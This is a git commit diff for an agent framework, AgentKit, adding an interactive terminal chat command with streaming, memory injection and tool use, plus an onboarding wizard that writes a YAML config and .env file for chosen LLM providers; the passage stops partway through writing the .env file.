feat(tools): add ShellTool + WebSearchTool, memory system, onboarding wizard, chat mode
- ShellTool: safe command execution with allowlist, blocked patterns (regex), timeout, output truncation - WebSearchTool: multi-backend search with Tavily → Serper → DuckDuckGo Lite fallback - MemoryTool: agent-callable tool with add/replace/remove/read actions - MemoryStore/MemoryFile: file-based memory (SOUL.md, USER.md, MEMORY.md, DAILY.md) - Onboarding wizard: provider selection, API key, model selection, agent personality - Chat mode: interactive CLI with streaming, memory injection, tool integration - Add 百炼 Coding Plan provider with 10 models - 102 unit tests (34 new for ShellTool + WebSearchTool)
This commit is contained in:
parent
9874a4aac0
commit
045fecd4ce
|
|
@ -0,0 +1,375 @@
|
||||||
|
"""Chat command — interactive terminal chat with an Agent.
|
||||||
|
|
||||||
|
Runs a lightweight in-process server and opens a REPL-style chat session.
|
||||||
|
No external server or Docker needed.
|
||||||
|
|
||||||
|
Usage:
|
||||||
|
agentkit chat # Start chatting (auto-onboard if no config)
|
||||||
|
agentkit chat --model deepseek/deepseek-chat # Use specific model
|
||||||
|
"""
|
||||||
|
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import os
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
import typer
|
||||||
|
from rich import print as rprint
|
||||||
|
from rich.panel import Panel
|
||||||
|
from rich.prompt import Prompt
|
||||||
|
from rich.markdown import Markdown
|
||||||
|
from rich.live import Live
|
||||||
|
from rich.text import Text
|
||||||
|
from rich.console import Group
|
||||||
|
|
||||||
|
|
||||||
|
def chat(
|
||||||
|
model: str = typer.Option("default", "--model", "-m", help="LLM model to use (e.g. deepseek/deepseek-chat)"),
|
||||||
|
agent_name: str = typer.Option("default", "--agent", "-a", help="Agent name to chat with"),
|
||||||
|
config: str | None = typer.Option(None, "--config", "-c", help="Path to agentkit.yaml"),
|
||||||
|
system_prompt: str | None = typer.Option(None, "--system-prompt", "-s", help="Custom system prompt"),
|
||||||
|
no_stream: bool = typer.Option(False, "--no-stream", help="Disable token streaming"),
|
||||||
|
):
|
||||||
|
"""Start an interactive chat session with an Agent."""
|
||||||
|
asyncio.run(_chat_async(model, agent_name, config, system_prompt, no_stream))
|
||||||
|
|
||||||
|
|
||||||
|
async def _chat_async(
|
||||||
|
model: str,
|
||||||
|
agent_name: str,
|
||||||
|
config_arg: str | None,
|
||||||
|
system_prompt: str | None,
|
||||||
|
no_stream: bool,
|
||||||
|
) -> None:
|
||||||
|
"""Async implementation of the chat command."""
|
||||||
|
from agentkit.cli.onboarding import run_onboarding
|
||||||
|
from agentkit.server.config import ServerConfig, find_config_path
|
||||||
|
|
||||||
|
# ── Onboarding check ──────────────────────────────────────────
|
||||||
|
config_path = find_config_path(config_arg)
|
||||||
|
if config_path is None:
|
||||||
|
config_path = run_onboarding(config_arg=config_arg)
|
||||||
|
if config_path is None:
|
||||||
|
rprint("[red]Onboarding cancelled. Cannot start chat without configuration.[/red]")
|
||||||
|
raise typer.Exit(code=1)
|
||||||
|
|
||||||
|
# ── Load config ───────────────────────────────────────────────
|
||||||
|
rprint(f"[dim]Loading config from {config_path}[/dim]")
|
||||||
|
|
||||||
|
# Load .env
|
||||||
|
from pathlib import Path
|
||||||
|
dotenv = Path(config_path).parent / ".env"
|
||||||
|
if dotenv.exists():
|
||||||
|
_load_dotenv(str(dotenv))
|
||||||
|
|
||||||
|
server_config = ServerConfig.from_yaml(config_path)
|
||||||
|
|
||||||
|
# ── Build in-process components ───────────────────────────────
|
||||||
|
from agentkit.session.manager import SessionManager
|
||||||
|
from agentkit.session.store import InMemorySessionStore
|
||||||
|
from agentkit.session.models import MessageRole
|
||||||
|
from agentkit.core.react import ReActEngine
|
||||||
|
from agentkit.tools.base import Tool
|
||||||
|
from agentkit.memory.profile import MemoryStore
|
||||||
|
from agentkit.tools.memory_tool import MemoryTool
|
||||||
|
from agentkit.tools.shell import ShellTool
|
||||||
|
from agentkit.tools.web_search import WebSearchTool
|
||||||
|
from agentkit.tools.web_crawl import WebCrawlTool
|
||||||
|
|
||||||
|
# Build LLM Gateway
|
||||||
|
gateway = _build_gateway(server_config)
|
||||||
|
|
||||||
|
# Initialize memory store
|
||||||
|
memory_store = MemoryStore()
|
||||||
|
memory_store.ensure_defaults()
|
||||||
|
memory_snapshot = memory_store.load_all()
|
||||||
|
|
||||||
|
# Create session
|
||||||
|
session_manager = SessionManager(store=InMemorySessionStore())
|
||||||
|
session = await session_manager.create_session(agent_name=agent_name)
|
||||||
|
|
||||||
|
# Build tools list — all available tools for chat mode
|
||||||
|
search_api_keys = _extract_search_keys(server_config)
|
||||||
|
tools: list[Tool] = [
|
||||||
|
MemoryTool(memory_store=memory_store),
|
||||||
|
ShellTool(working_dir=os.getcwd()),
|
||||||
|
WebSearchTool(**search_api_keys),
|
||||||
|
WebCrawlTool(),
|
||||||
|
]
|
||||||
|
|
||||||
|
# Build system prompt — inject memory into system prompt
|
||||||
|
base_prompt = system_prompt or (
|
||||||
|
"You are a helpful AI assistant. "
|
||||||
|
"Remember the context of our conversation and refer back to earlier messages. "
|
||||||
|
"Respond clearly and concisely."
|
||||||
|
)
|
||||||
|
effective_system_prompt = memory_store.build_system_prompt(memory_snapshot, base_prompt)
|
||||||
|
|
||||||
|
# Resolve agent display name from SOUL.md
|
||||||
|
agent_display_name = memory_store.get_file("soul").read_section("身份") or agent_name
|
||||||
|
# Extract just the name (first line after "我是")
|
||||||
|
for prefix in ["我是", "我叫", "我的名字是"]:
|
||||||
|
if prefix in agent_display_name:
|
||||||
|
name_part = agent_display_name.split(prefix, 1)[1].strip()
|
||||||
|
# Take first meaningful token (before comma, period, etc.)
|
||||||
|
for sep in [",", "。", "、", ",", ".", " "]:
|
||||||
|
if sep in name_part:
|
||||||
|
name_part = name_part.split(sep)[0]
|
||||||
|
break
|
||||||
|
agent_display_name = name_part
|
||||||
|
break
|
||||||
|
|
||||||
|
# ── Welcome banner ────────────────────────────────────────────
|
||||||
|
effective_model = model if model != "default" else _resolve_default_model(server_config)
|
||||||
|
rprint(Panel(
|
||||||
|
f"[bold]AgentKit Chat[/bold]\n\n"
|
||||||
|
f" Model: [cyan]{effective_model}[/cyan]\n"
|
||||||
|
f" Agent: [cyan]{agent_display_name}[/cyan]\n"
|
||||||
|
f" Session: [dim]{session.session_id[:8]}...[/dim]\n\n"
|
||||||
|
f" Type your message and press Enter.\n"
|
||||||
|
f" [dim]/help[/dim] — Show commands\n"
|
||||||
|
f" [dim]/clear[/dim] — Clear conversation\n"
|
||||||
|
f" [dim]/model <name>[/dim] — Switch model\n"
|
||||||
|
f" [dim]/quit[/dim] — Exit chat",
|
||||||
|
title="AgentKit",
|
||||||
|
border_style="bright_blue",
|
||||||
|
))
|
||||||
|
|
||||||
|
# ── Chat loop ─────────────────────────────────────────────────
|
||||||
|
react_engine = ReActEngine(llm_gateway=gateway)
|
||||||
|
current_model = effective_model
|
||||||
|
conversation_had_messages = False
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
user_input = Prompt.ask("\n[bold green]You[/bold green]")
|
||||||
|
except (EOFError, KeyboardInterrupt):
|
||||||
|
rprint("\n[dim]Goodbye![/dim]")
|
||||||
|
break
|
||||||
|
|
||||||
|
if not user_input.strip():
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Handle commands
|
||||||
|
if user_input.startswith("/"):
|
||||||
|
cmd = user_input.strip().lower()
|
||||||
|
if cmd in ("/quit", "/q", "/exit"):
|
||||||
|
rprint("[dim]Goodbye![/dim]")
|
||||||
|
break
|
||||||
|
elif cmd == "/help":
|
||||||
|
_print_help()
|
||||||
|
continue
|
||||||
|
elif cmd == "/clear":
|
||||||
|
# Create a new session (memory files persist)
|
||||||
|
session = await session_manager.create_session(agent_name=agent_name)
|
||||||
|
rprint("[dim]Conversation cleared. New session started.[/dim]")
|
||||||
|
continue
|
||||||
|
elif cmd.startswith("/model "):
|
||||||
|
current_model = cmd.split(" ", 1)[1].strip()
|
||||||
|
rprint(f"[dim]Switched to model: {current_model}[/dim]")
|
||||||
|
continue
|
||||||
|
else:
|
||||||
|
rprint(f"[yellow]Unknown command: {cmd}[/yellow]")
|
||||||
|
continue
|
||||||
|
|
||||||
|
conversation_had_messages = True
|
||||||
|
|
||||||
|
# Append user message to session
|
||||||
|
await session_manager.append_message(
|
||||||
|
session_id=session.session_id,
|
||||||
|
role=MessageRole.USER,
|
||||||
|
content=user_input,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Get full conversation history (includes all previous turns)
|
||||||
|
chat_messages = await session_manager.get_chat_messages(session.session_id)
|
||||||
|
|
||||||
|
# Print Agent label before streaming
|
||||||
|
rprint(f"\n[bold blue]{agent_display_name}[/bold blue]: ", end="")
|
||||||
|
|
||||||
|
# Execute Agent
|
||||||
|
try:
|
||||||
|
if no_stream:
|
||||||
|
# Non-streaming mode
|
||||||
|
result = await react_engine.execute(
|
||||||
|
messages=chat_messages,
|
||||||
|
tools=tools,
|
||||||
|
model=current_model,
|
||||||
|
agent_name=agent_name,
|
||||||
|
system_prompt=effective_system_prompt,
|
||||||
|
)
|
||||||
|
output = result.output if hasattr(result, "output") else str(result)
|
||||||
|
rprint(output)
|
||||||
|
|
||||||
|
await session_manager.append_message(
|
||||||
|
session_id=session.session_id,
|
||||||
|
role=MessageRole.ASSISTANT,
|
||||||
|
content=output,
|
||||||
|
agent_name=agent_name,
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
# Streaming mode — Live displays under the "Agent:" label
|
||||||
|
full_content = ""
|
||||||
|
with Live(
|
||||||
|
Text(""),
|
||||||
|
refresh_per_second=15,
|
||||||
|
vertical_overflow="visible",
|
||||||
|
transient=False, # Keep final output on screen
|
||||||
|
) as live:
|
||||||
|
async for event in react_engine.execute_stream(
|
||||||
|
messages=chat_messages,
|
||||||
|
tools=tools,
|
||||||
|
model=current_model,
|
||||||
|
agent_name=agent_name,
|
||||||
|
system_prompt=effective_system_prompt,
|
||||||
|
):
|
||||||
|
if event.event_type == "token":
|
||||||
|
token = event.data.get("content", "")
|
||||||
|
full_content += token
|
||||||
|
live.update(Text(full_content))
|
||||||
|
elif event.event_type == "final_answer":
|
||||||
|
# Use final_answer output (may differ slightly from accumulated tokens)
|
||||||
|
full_content = event.data.get("output", full_content)
|
||||||
|
live.update(Markdown(full_content))
|
||||||
|
elif event.event_type == "tool_call":
|
||||||
|
tool_name = event.data.get("tool_name", "unknown")
|
||||||
|
live.update(Text(f"[calling tool: {tool_name}...]"))
|
||||||
|
elif event.event_type == "tool_result":
|
||||||
|
# After tool result, show accumulated content again
|
||||||
|
if full_content:
|
||||||
|
live.update(Text(full_content))
|
||||||
|
|
||||||
|
# Live already displayed the final content, no need to rprint again
|
||||||
|
|
||||||
|
await session_manager.append_message(
|
||||||
|
session_id=session.session_id,
|
||||||
|
role=MessageRole.ASSISTANT,
|
||||||
|
content=full_content,
|
||||||
|
agent_name=agent_name,
|
||||||
|
)
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
rprint(f"\n[red]Error: {e}[/red]")
|
||||||
|
|
||||||
|
# ── Session end: generate daily log ────────────────────────────
|
||||||
|
if conversation_had_messages:
|
||||||
|
try:
|
||||||
|
messages = await session_manager.get_messages(session.session_id)
|
||||||
|
if messages:
|
||||||
|
# Build a brief summary of the conversation
|
||||||
|
summary_parts = []
|
||||||
|
for msg in messages[-10:]: # Last 10 messages
|
||||||
|
role = msg.role.value if hasattr(msg.role, "value") else str(msg.role)
|
||||||
|
summary_parts.append(f"{role}: {msg.content[:100]}")
|
||||||
|
summary = "\n".join(summary_parts)
|
||||||
|
|
||||||
|
daily = memory_store.get_file("daily")
|
||||||
|
existing = daily.read()
|
||||||
|
new_entry = f"## 会话摘要\n{summary}"
|
||||||
|
if existing:
|
||||||
|
daily.write(f"{existing}\n\n{new_entry}")
|
||||||
|
else:
|
||||||
|
daily.write(new_entry)
|
||||||
|
|
||||||
|
# Archive old daily logs
|
||||||
|
memory_store.archive_old_dailies(keep_days=2)
|
||||||
|
except Exception:
|
||||||
|
pass # Daily log generation is best-effort
|
||||||
|
|
||||||
|
|
||||||
|
def _extract_search_keys(server_config: "ServerConfig") -> dict[str, str]:
|
||||||
|
"""Extract search API keys from server config environment."""
|
||||||
|
return {
|
||||||
|
"tavily_api_key": os.environ.get("TAVILY_API_KEY"),
|
||||||
|
"serper_api_key": os.environ.get("SERPER_API_KEY"),
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def _build_gateway(server_config: "ServerConfig") -> "LLMGateway":
|
||||||
|
"""Build LLMGateway from ServerConfig, same logic as app.py."""
|
||||||
|
from agentkit.llm.gateway import LLMGateway
|
||||||
|
from agentkit.llm.providers.anthropic import AnthropicProvider
|
||||||
|
from agentkit.llm.providers.gemini import GeminiProvider
|
||||||
|
from agentkit.llm.providers.openai import OpenAICompatibleProvider
|
||||||
|
|
||||||
|
gateway = LLMGateway(config=server_config.llm_config)
|
||||||
|
|
||||||
|
for name, pconf in server_config.llm_config.providers.items():
|
||||||
|
if not pconf.api_key:
|
||||||
|
continue
|
||||||
|
try:
|
||||||
|
if pconf.type == "anthropic":
|
||||||
|
provider = AnthropicProvider(
|
||||||
|
api_key=pconf.api_key,
|
||||||
|
model=list(pconf.models.keys())[0] if pconf.models else "claude-sonnet-4-20250514",
|
||||||
|
max_tokens=pconf.max_tokens,
|
||||||
|
base_url=pconf.base_url or "https://api.anthropic.com",
|
||||||
|
timeout=pconf.timeout,
|
||||||
|
)
|
||||||
|
elif pconf.type == "gemini":
|
||||||
|
provider = GeminiProvider(
|
||||||
|
api_key=pconf.api_key,
|
||||||
|
model=list(pconf.models.keys())[0] if pconf.models else "gemini-2.0-flash",
|
||||||
|
max_output_tokens=pconf.max_tokens,
|
||||||
|
base_url=pconf.base_url or "https://generativelanguage.googleapis.com",
|
||||||
|
timeout=pconf.timeout,
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
provider = OpenAICompatibleProvider(
|
||||||
|
api_key=pconf.api_key,
|
||||||
|
base_url=pconf.base_url,
|
||||||
|
)
|
||||||
|
gateway.register_provider(name, provider)
|
||||||
|
except Exception as e:
|
||||||
|
import logging
|
||||||
|
logging.getLogger(__name__).warning(f"Failed to register LLM provider '{name}': {e}")
|
||||||
|
|
||||||
|
return gateway
|
||||||
|
|
||||||
|
|
||||||
|
def _resolve_default_model(server_config: "ServerConfig") -> str:
|
||||||
|
"""Resolve the default model from config."""
|
||||||
|
if server_config.llm_config.model_aliases and "default" in server_config.llm_config.model_aliases:
|
||||||
|
return server_config.llm_config.model_aliases["default"]
|
||||||
|
# Fallback: first provider's first model
|
||||||
|
for name, pconf in server_config.llm_config.providers.items():
|
||||||
|
if pconf.api_key and pconf.models:
|
||||||
|
first_model = list(pconf.models.keys())[0]
|
||||||
|
return f"{name}/{first_model}"
|
||||||
|
return "default"
|
||||||
|
|
||||||
|
|
||||||
|
def _load_dotenv(dotenv_path: str) -> None:
|
||||||
|
"""Load .env file into environment."""
|
||||||
|
from pathlib import Path
|
||||||
|
path = Path(dotenv_path)
|
||||||
|
if not path.exists():
|
||||||
|
return
|
||||||
|
with open(path, encoding="utf-8") as f:
|
||||||
|
for line in f:
|
||||||
|
line = line.strip()
|
||||||
|
if not line or line.startswith("#"):
|
||||||
|
continue
|
||||||
|
if "=" not in line:
|
||||||
|
continue
|
||||||
|
key, _, value = line.partition("=")
|
||||||
|
key = key.strip()
|
||||||
|
value = value.strip().strip("\"'")
|
||||||
|
if key and key not in os.environ:
|
||||||
|
os.environ[key] = value
|
||||||
|
|
||||||
|
|
||||||
|
def _print_help() -> None:
|
||||||
|
"""Print chat command help."""
|
||||||
|
rprint(Panel(
|
||||||
|
"[bold]Chat Commands[/bold]\n\n"
|
||||||
|
" [cyan]/help[/cyan] — Show this help\n"
|
||||||
|
" [cyan]/clear[/cyan] — Clear conversation (new session)\n"
|
||||||
|
" [cyan]/model <name>[/cyan] — Switch LLM model\n"
|
||||||
|
" [cyan]/quit[/cyan] — Exit chat\n\n"
|
||||||
|
"[bold]Tips[/bold]\n\n"
|
||||||
|
" • Multi-line input: end a line with [cyan]\\[/cyan] to continue\n"
|
||||||
|
" • Your conversation is stored in memory for the session",
|
||||||
|
border_style="dim",
|
||||||
|
))
|
||||||
|
|
@ -26,6 +26,9 @@ app.command(name="usage")(usage)
|
||||||
from agentkit.cli.pair import pair # noqa: E402
|
from agentkit.cli.pair import pair # noqa: E402
|
||||||
app.command(name="pair")(pair)
|
app.command(name="pair")(pair)
|
||||||
|
|
||||||
|
from agentkit.cli.chat import chat # noqa: E402
|
||||||
|
app.command(name="chat")(chat)
|
||||||
|
|
||||||
|
|
||||||
@app.command()
|
@app.command()
|
||||||
def serve(
|
def serve(
|
||||||
|
|
@ -41,10 +44,22 @@ def serve(
|
||||||
import uvicorn
|
import uvicorn
|
||||||
|
|
||||||
from agentkit.server.config import ServerConfig, find_config_path
|
from agentkit.server.config import ServerConfig, find_config_path
|
||||||
|
from agentkit.cli.onboarding import needs_onboarding, run_onboarding
|
||||||
|
|
||||||
# Load .env file if present
|
# Load .env file if present
|
||||||
config_path = find_config_path(config)
|
config_path = find_config_path(config)
|
||||||
|
|
||||||
|
# Onboarding check
|
||||||
|
if config_path is None:
|
||||||
|
rprint("[yellow]No agentkit.yaml found.[/yellow]")
|
||||||
|
from rich.prompt import Confirm
|
||||||
|
if Confirm.ask("Would you like to run the setup wizard?", default=True):
|
||||||
|
config_path = run_onboarding(config_arg=config)
|
||||||
|
if config_path is None:
|
||||||
|
rprint("[red]Setup cancelled. Using defaults.[/red]")
|
||||||
|
else:
|
||||||
|
rprint("[dim]Using default configuration (no LLM providers).[/dim]")
|
||||||
|
|
||||||
if config_path:
|
if config_path:
|
||||||
rprint(f"[green]Loading config from {config_path}[/green]")
|
rprint(f"[green]Loading config from {config_path}[/green]")
|
||||||
server_config = ServerConfig.from_yaml(config_path)
|
server_config = ServerConfig.from_yaml(config_path)
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,316 @@
|
||||||
|
"""Onboarding flow — interactive first-time configuration wizard.
|
||||||
|
|
||||||
|
When no agentkit.yaml exists, this wizard guides the user through:
|
||||||
|
1. Choosing an LLM provider
|
||||||
|
2. Entering API key
|
||||||
|
3. Selecting a default model
|
||||||
|
4. Generating agentkit.yaml + .env
|
||||||
|
"""
|
||||||
|
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import os
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
import yaml
|
||||||
|
from rich.panel import Panel
|
||||||
|
from rich.prompt import Prompt, Confirm
|
||||||
|
from rich import print as rprint
|
||||||
|
|
||||||
|
from agentkit.server.config import find_config_path
|
||||||
|
|
||||||
|
|
||||||
|
# ── Provider presets ──────────────────────────────────────────────────
|
||||||
|
|
||||||
|
PROVIDER_PRESETS: dict[str, dict[str, Any]] = {
|
||||||
|
"deepseek": {
|
||||||
|
"name": "DeepSeek",
|
||||||
|
"env_key": "DEEPSEEK_API_KEY",
|
||||||
|
"base_url": "https://api.deepseek.com/v1",
|
||||||
|
"type": "openai",
|
||||||
|
"models": {
|
||||||
|
"deepseek-chat": {"alias": "default"},
|
||||||
|
"deepseek-reasoner": {"alias": "reasoning"},
|
||||||
|
},
|
||||||
|
"default_model": "deepseek-chat",
|
||||||
|
},
|
||||||
|
"openai": {
|
||||||
|
"name": "OpenAI",
|
||||||
|
"env_key": "OPENAI_API_KEY",
|
||||||
|
"base_url": "https://api.openai.com/v1",
|
||||||
|
"type": "openai",
|
||||||
|
"models": {
|
||||||
|
"gpt-4o": {"alias": "default"},
|
||||||
|
"gpt-4o-mini": {"alias": "fast"},
|
||||||
|
},
|
||||||
|
"default_model": "gpt-4o",
|
||||||
|
},
|
||||||
|
"bailian-coding": {
|
||||||
|
"name": "百炼 Coding Plan",
|
||||||
|
"env_key": "DASHSCOPE_API_KEY",
|
||||||
|
"base_url": "https://coding.dashscope.aliyuncs.com/v1",
|
||||||
|
"type": "openai",
|
||||||
|
"models": {
|
||||||
|
"qwen3.7-plus": {"alias": "default"},
|
||||||
|
"qwen3.6-plus": {},
|
||||||
|
"qwen3.5-plus": {},
|
||||||
|
"qwen3-max-2026-01-23": {},
|
||||||
|
"qwen3-coder-plus": {"alias": "coder"},
|
||||||
|
"qwen3-coder-next": {},
|
||||||
|
"kimi-k2.5": {},
|
||||||
|
"glm-5": {},
|
||||||
|
"glm-4.7": {},
|
||||||
|
"MiniMax-M2.5": {},
|
||||||
|
},
|
||||||
|
"default_model": "qwen3.7-plus",
|
||||||
|
},
|
||||||
|
"qwen": {
|
||||||
|
"name": "通义千问 (Qwen/DashScope)",
|
||||||
|
"env_key": "DASHSCOPE_API_KEY",
|
||||||
|
"base_url": "https://dashscope.aliyuncs.com/compatible-mode/v1",
|
||||||
|
"type": "openai",
|
||||||
|
"models": {
|
||||||
|
"qwen-plus": {"alias": "default"},
|
||||||
|
"qwen-turbo": {"alias": "fast"},
|
||||||
|
},
|
||||||
|
"default_model": "qwen-plus",
|
||||||
|
},
|
||||||
|
"doubao": {
|
||||||
|
"name": "豆包 (Doubao)",
|
||||||
|
"env_key": "DOUBAO_API_KEY",
|
||||||
|
"base_url": "https://ark.cn-beijing.volces.com/api/v3",
|
||||||
|
"type": "openai",
|
||||||
|
"models": {
|
||||||
|
"doubao-pro-32k": {"alias": "default"},
|
||||||
|
},
|
||||||
|
"default_model": "doubao-pro-32k",
|
||||||
|
},
|
||||||
|
"gemini": {
|
||||||
|
"name": "Google Gemini",
|
||||||
|
"env_key": "GEMINI_API_KEY",
|
||||||
|
"base_url": "https://generativelanguage.googleapis.com",
|
||||||
|
"type": "gemini",
|
||||||
|
"models": {
|
||||||
|
"gemini-2.0-flash": {"alias": "default"},
|
||||||
|
},
|
||||||
|
"default_model": "gemini-2.0-flash",
|
||||||
|
},
|
||||||
|
"anthropic": {
|
||||||
|
"name": "Anthropic Claude",
|
||||||
|
"env_key": "ANTHROPIC_API_KEY",
|
||||||
|
"base_url": "https://api.anthropic.com",
|
||||||
|
"type": "anthropic",
|
||||||
|
"models": {
|
||||||
|
"claude-sonnet-4-20250514": {"alias": "default"},
|
||||||
|
},
|
||||||
|
"default_model": "claude-sonnet-4-20250514",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def needs_onboarding(config_arg: str | None = None) -> bool:
|
||||||
|
"""Check if onboarding is needed (no config file found)."""
|
||||||
|
return find_config_path(config_arg) is None
|
||||||
|
|
||||||
|
|
||||||
|
def run_onboarding(
|
||||||
|
output_dir: str = ".",
|
||||||
|
config_arg: str | None = None,
|
||||||
|
) -> str | None:
|
||||||
|
"""Run the interactive onboarding wizard.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Path to the generated config file, or None if cancelled.
|
||||||
|
"""
|
||||||
|
rprint(Panel(
|
||||||
|
"[bold]Welcome to AgentKit![/bold]\n\n"
|
||||||
|
"No configuration file found. Let's set up your first Agent.\n"
|
||||||
|
"This will create [cyan]agentkit.yaml[/cyan] and [cyan].env[/cyan] for you.",
|
||||||
|
title="AgentKit Setup",
|
||||||
|
border_style="bright_blue",
|
||||||
|
))
|
||||||
|
|
||||||
|
output_path = Path(output_dir).resolve()
|
||||||
|
output_path.mkdir(parents=True, exist_ok=True)
|
||||||
|
|
||||||
|
# ── Step 1: Choose LLM provider ──────────────────────────────
|
||||||
|
rprint("\n[bold]Step 1: Choose your LLM provider[/bold]")
|
||||||
|
provider_keys = list(PROVIDER_PRESETS.keys())
|
||||||
|
for i, key in enumerate(provider_keys, 1):
|
||||||
|
preset = PROVIDER_PRESETS[key]
|
||||||
|
rprint(f" [cyan]{i}[/cyan]. {preset['name']}")
|
||||||
|
|
||||||
|
choice = Prompt.ask(
|
||||||
|
"\nSelect a provider",
|
||||||
|
choices=[str(i) for i in range(1, len(provider_keys) + 1)],
|
||||||
|
default="1",
|
||||||
|
)
|
||||||
|
selected_key = provider_keys[int(choice) - 1]
|
||||||
|
preset = PROVIDER_PRESETS[selected_key]
|
||||||
|
|
||||||
|
rprint(f"\n[green]Selected: {preset['name']}[/green]")
|
||||||
|
|
||||||
|
# ── Step 2: Enter API key ─────────────────────────────────────
|
||||||
|
rprint(f"\n[bold]Step 2: Enter your API key[/bold]")
|
||||||
|
rprint(f"You can get one from the {preset['name']} dashboard.")
|
||||||
|
api_key = Prompt.ask(
|
||||||
|
f" {preset['env_key']}",
|
||||||
|
password=True,
|
||||||
|
)
|
||||||
|
|
||||||
|
if not api_key.strip():
|
||||||
|
rprint("[red]API key is required. Onboarding cancelled.[/red]")
|
||||||
|
return None
|
||||||
|
|
||||||
|
# ── Step 2b: Select default model ────────────────────────────
|
||||||
|
available_models = list(preset["models"].keys())
|
||||||
|
if len(available_models) > 1:
|
||||||
|
rprint(f"\n[bold]Step 2b: Select your default model[/bold]")
|
||||||
|
for i, model in enumerate(available_models, 1):
|
||||||
|
alias = preset["models"][model].get("alias", "")
|
||||||
|
alias_str = f" [dim]({alias})[/dim]" if alias else ""
|
||||||
|
recommended = " [green]← recommended[/green]" if model == preset.get("default_model") else ""
|
||||||
|
rprint(f" [cyan]{i}[/cyan]. {model}{alias_str}{recommended}")
|
||||||
|
model_choice = Prompt.ask(
|
||||||
|
"Select default model",
|
||||||
|
choices=[str(i) for i in range(1, len(available_models) + 1)],
|
||||||
|
default=str(available_models.index(preset.get("default_model", available_models[0])) + 1),
|
||||||
|
)
|
||||||
|
selected_model = available_models[int(model_choice) - 1]
|
||||||
|
# Rebuild models dict: selected model gets "default" alias
|
||||||
|
updated_models: dict[str, Any] = {}
|
||||||
|
for model, conf in preset["models"].items():
|
||||||
|
if model == selected_model:
|
||||||
|
updated_models[model] = {**conf, "alias": "default"}
|
||||||
|
else:
|
||||||
|
# Remove "default" alias from other models
|
||||||
|
updated_models[model] = {k: v for k, v in conf.items() if k != "alias" or v != "default"}
|
||||||
|
preset = {**preset, "models": updated_models}
|
||||||
|
rprint(f"[green]Selected: {selected_model}[/green]")
|
||||||
|
else:
|
||||||
|
selected_model = available_models[0]
|
||||||
|
|
||||||
|
# ── Step 3: Optional — add a second provider ─────────────────
|
||||||
|
env_vars: dict[str, str] = {preset["env_key"]: api_key.strip()}
|
||||||
|
providers_config: dict[str, Any] = {
|
||||||
|
selected_key: {
|
||||||
|
"api_key": f"${{{preset['env_key']}}}",
|
||||||
|
"base_url": preset["base_url"],
|
||||||
|
"type": preset["type"],
|
||||||
|
"models": preset["models"],
|
||||||
|
}
|
||||||
|
}
|
||||||
|
model_aliases: dict[str, str] = {alias: f"{selected_key}/{model}" for model, conf in preset["models"].items() if (alias := conf.get("alias"))}
|
||||||
|
|
||||||
|
if Confirm.ask("\nWould you like to add a second LLM provider (for fallback)?", default=False):
|
||||||
|
remaining = [k for k in provider_keys if k != selected_key]
|
||||||
|
for i, key in enumerate(remaining, 1):
|
||||||
|
rprint(f" [cyan]{i}[/cyan]. {PROVIDER_PRESETS[key]['name']}")
|
||||||
|
choice2 = Prompt.ask(
|
||||||
|
"Select second provider (or press Enter to skip)",
|
||||||
|
choices=[str(i) for i in range(1, len(remaining) + 1)] + [""],
|
||||||
|
default="",
|
||||||
|
)
|
||||||
|
if choice2:
|
||||||
|
key2 = remaining[int(choice2) - 1]
|
||||||
|
preset2 = PROVIDER_PRESETS[key2]
|
||||||
|
api_key2 = Prompt.ask(f" {preset2['env_key']}", password=True)
|
||||||
|
if api_key2.strip():
|
||||||
|
env_vars[preset2["env_key"]] = api_key2.strip()
|
||||||
|
providers_config[key2] = {
|
||||||
|
"api_key": f"${{{preset2['env_key']}}}",
|
||||||
|
"base_url": preset2["base_url"],
|
||||||
|
"type": preset2["type"],
|
||||||
|
"models": preset2["models"],
|
||||||
|
}
|
||||||
|
for model, conf in preset2["models"].items():
|
||||||
|
alias = conf.get("alias")
|
||||||
|
if alias and alias not in model_aliases:
|
||||||
|
model_aliases[alias] = f"{key2}/{model}"
|
||||||
|
|
||||||
|
# ── Step 4: Generate config files ─────────────────────────────
|
||||||
|
rprint("\n[bold]Step 3: Generating configuration...[/bold]")
|
||||||
|
|
||||||
|
config = {
|
||||||
|
"server": {
|
||||||
|
"host": "0.0.0.0",
|
||||||
|
"port": 8001,
|
||||||
|
"workers": 1,
|
||||||
|
"rate_limit": 60,
|
||||||
|
},
|
||||||
|
"llm": {
|
||||||
|
"providers": providers_config,
|
||||||
|
"model_aliases": model_aliases,
|
||||||
|
},
|
||||||
|
"session": {
|
||||||
|
"backend": "memory",
|
||||||
|
},
|
||||||
|
"bus": {
|
||||||
|
"backend": "memory",
|
||||||
|
},
|
||||||
|
"task_store": {
|
||||||
|
"backend": "memory",
|
||||||
|
},
|
||||||
|
"skills": {
|
||||||
|
"auto_discover": True,
|
||||||
|
"paths": ["./skills"],
|
||||||
|
},
|
||||||
|
"logging": {
|
||||||
|
"level": "INFO",
|
||||||
|
"format": "text",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
# Write agentkit.yaml
|
||||||
|
config_path = output_path / "agentkit.yaml"
|
||||||
|
with open(config_path, "w", encoding="utf-8") as f:
|
||||||
|
yaml.dump(config, f, default_flow_style=False, allow_unicode=True, sort_keys=False)
|
||||||
|
rprint(f" [green]Created:[/green] {config_path}")
|
||||||
|
|
||||||
|
# Write .env
|
||||||
|
env_path = output_path / ".env"
|
||||||
|
env_lines = [f"{k}={v}" for k, v in env_vars.items()]
|
||||||
|
with open(env_path, "w", encoding="utf-8") as f:
|
||||||
|
f.write("# AgentKit Environment Variables\n")
|
||||||
|
f.write("# Generated by onboarding wizard\n\n")
|
||||||
|
